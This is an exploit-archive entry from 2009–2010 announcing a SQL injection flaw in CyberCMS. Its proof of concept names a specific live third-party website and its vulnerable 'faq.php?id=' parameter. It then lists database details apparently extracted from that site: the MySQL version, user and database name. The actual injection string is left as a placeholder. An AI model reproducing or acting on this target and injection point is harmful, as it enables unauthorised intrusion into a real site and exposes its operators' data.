id: 11464
date: 03/26/2010
title: CyberCMS Remote SQL Injection Vulnerability
author: hc0de
cves: 

===========================================
CyberCMS Remote SQL Injection Vulnerability
===========================================


# Exploit Title: CyberCMS Remote SQL Injection Vuln.
# Date: 26/11/2009
# Author: hc0de | hc0de.blogspot.com<http://hc0de.blogspot.com>
# Software Link: http://cyberfusion.ramx.org/cyber-cms
# Version: [app version]
# Tested on: Ubuntu Linux 9.04
# CVE :
# PoC:
 
+Target: http://www.ungmors.dk/faq.php?id=SQL_CODE
 
-MySQL Version: 5.0.37-community-nt
-MySQL User: skoleung@localhost
-MySQL Database: uskole



#  0day.today [2023-03-24]  #